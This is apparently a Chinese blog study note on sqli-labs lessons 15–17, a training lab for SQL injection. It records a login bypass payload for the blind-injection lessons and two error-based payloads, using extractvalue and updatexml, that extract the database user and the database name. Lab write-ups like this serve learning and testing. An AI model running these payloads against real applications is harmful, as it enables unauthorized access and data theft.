sqlilab less15-17
less15
试了很多符号,页面根本不显示别的信息,猜测为盲注
可是怎么检测闭合?
万能密码登录
最终试出来’闭合
uname=1’ or 1=1 #
接下来就要工具跑
less16
同上用万能密码试闭合,工具/脚本跑
less-17
原理https://www.cnblogs.com/laoxiajiadeyun/p/10488731.html
insert基于报错的注入,updatexml(php>5.1),extractvalue
uname=Dumb&passwd=aaa' or extractvalue(1, concat(0x7c,(select user())));-- #&submit=Submit
uname=Dumb&passwd=aaa' or updatexml(123,concat('~',(select database())),123)-- #&submit=Submit
[博客内容只是本人学习过程记录的笔记,不保证质量.本人不保证技术的实用性,一切文章仅供参考,如有谬错,请留言.]